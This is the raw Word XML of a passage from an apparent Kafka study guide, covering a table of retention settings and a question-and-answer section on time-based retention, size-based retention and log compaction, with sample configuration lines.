          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="284FE508" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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lastRenderedPageBreak/>
              <w:t>log.retention.bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C123D39" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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Size-based retention. Logs are deleted when the log size exceeds this value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02C37AF8" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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Unlimited (-1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="64E0FB40" w14:textId="77777777" w:rsidTr="00684E32">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="641C76E9" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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og.cleanup.policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="330AC40D" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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leanup policy for the topic. Can be delete (default) or compact.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F1006C8" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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delete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="6A9DEB8D" w14:textId="77777777" w:rsidTr="00684E32">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2613A2DD" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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og.segment.bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A5BBF3E" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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e size of each log segment file.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CC487E4" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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1073741824 (1 GB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47626321" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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Considerations When Setting Retention Policy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2481B9D7" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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tention and Consumer Lag</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retention policies impact how long consumers can consume messages from topics. If a consumer falls behind and messages are deleted due to retention expiration, the consumer will no longer be able to access those messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC32035" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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torage Space Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Carefully configure retention policies to avoid excessive disk usage. Size-based retention is often used when storage space is a concern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB76673" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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mpaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Log compaction is ideal for cases where you need to store only the latest value for each key (e.g., tracking the latest state of an entity like user profiles).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E21168" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC2B57F" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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retention policies allow you to control how long messages are stored in topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B9A67F" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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Time-based retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retain messages for a specific time period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21353C6B" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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ize-based retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retain messages until the partition size exceeds a limit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B8607" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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og compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retain only the latest message for each key in a topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C317403" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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allows topic-level configuration overrides to customize retention behavior for specific topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703C7D24" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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By using the correct retention policy, you can optimize storage, manage disk usage, and ensure consumers can read data as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373CEFDC" w14:textId="6B06481A" w:rsidR="00412451" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00412451">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13AE23F">
          <v:rect id="_x0000_i3162" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BAA846" w14:textId="280C5D9D" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB22BB" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="786" w:name="_Toc196308266"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Describe how Kafka retains messages and the different retention policies available (time-based, size-based, etc.)</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="786"/>
    </w:p>
    <w:p w14:paraId="1E5F626E" w14:textId="2765ADF3" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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provides flexible retention policies for managing how long messages are retained in a topic. Retention policies are crucial for optimizing storage and controlling the lifespan of data in Kafka, ensuring that old messages are deleted or compacted as required. Kafka offers two main types of retention policies: </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>time-based retention</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size-based retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, along with </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4FE370" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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 Retention Mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD5127C" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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retains messages based on specific configurations defined at the broker or topic level. The messages are stored in log files for each partition, and Kafka’s retention mechanisms determine how long those messages are kept before they are eligible for deletion. This is important because Kafka is designed to handle large volumes of messages, and without proper retention management, the system could run out of disk space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C32EDE0" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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1. Time-Based Retention (log.retention.ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DC6125" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retains messages in a partition for a specified period, after which the messages are eligible for deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6987C02D" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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figuration</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is configured using the log.retention.ms property, where you define the time duration in milliseconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E4623B" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9929C8" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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og.retention.ms=86400000  # Retain messages for 1 day (86400000 ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E4A7EA" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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How It Works</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka tracks the timestamp of each message in the log. When the retention time expires for a message, Kafka marks it for deletion. However, messages are not deleted immediately but during the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log segment cleanup</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which happens periodically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0A6FB5" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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efault</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The default retention period is </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7 days (604800000 ms)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if not configured explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176C5955" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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Use Cases</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Time-based retention is ideal when you know you need to keep messages for a specific duration (e.g., keeping logs of user activities for a week).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ABDEE8" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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2. Size-Based Retention (log.retention.bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069339A2" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retains messages in a partition until the total size of the logs exceeds a configured size, at which point the oldest messages are eligible for deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916BD0A" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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figuration</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is configured using the log.retention.bytes property, where you specify the maximum log size in bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585F0385" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5016EBD1" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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og.retention.bytes=10737418240  # Retain messages until partition size exceeds 10 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A619D5A" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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lastRenderedPageBreak/>
        <w:t>How It Works</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka keeps adding messages to the log segments until the partition size reaches the configured limit. When the size is exceeded, Kafka begins deleting the oldest log segments to free up space for new messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE32CE" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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efault</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By default, Kafka does not impose a size limit (-1), which means log size is not a constraint unless explicitly defined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404FC9A6" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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Use Cases</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Size-based retention is useful when you're managing limited disk space and need to control the overall size of a topic's log. For instance, Kafka could be used to store logs or sensor data that shouldn't exceed a certain size limit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF7C3B7" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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3. Log Compaction (log.cleanup.policy=compact)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1C1839" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Log compaction is a different type of retention policy where Kafka keeps the latest message for each key, removing older messages with the same key. This allows you to retain only the most recent state of a record, which is useful when you need to track the latest value for a key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DA2D42" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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figuration</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can enable log compaction by setting the log.cleanup.policy to compact for a topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0406FBD8" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF85028" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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og.cleanup.policy=compact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4327DB55" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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How It Works</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka does not delete messages based on time or size, but instead retains only the most recent message for each key. When a new message with the same key is written, Kafka will discard the older messages with the same key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B162CAF" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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Use Cases</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Log compaction is useful in cases where you need to keep only the latest version of each record, such as keeping the latest state of user profiles or product inventory. This is commonly used in scenarios like event sourcing or change data capture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBD297D" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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4. Combination of Time and Size-Based Retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FED7A41" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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allows you to combine both time-based and size-based retention policies. This way, Kafka will delete messages either when they reach the specified time limit or when the partition exceeds a certain size, whichever comes first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2477BAED" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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5. Additional Configurations Related to Retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204AC920" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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og.segment.bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Controls the size of individual log segments in a partition. When a segment file reaches this size, a new segment is created. It does not directly impact retention, but it affects how logs are stored and cleaned up.</w:t>
      </w:r>
    </w:p>
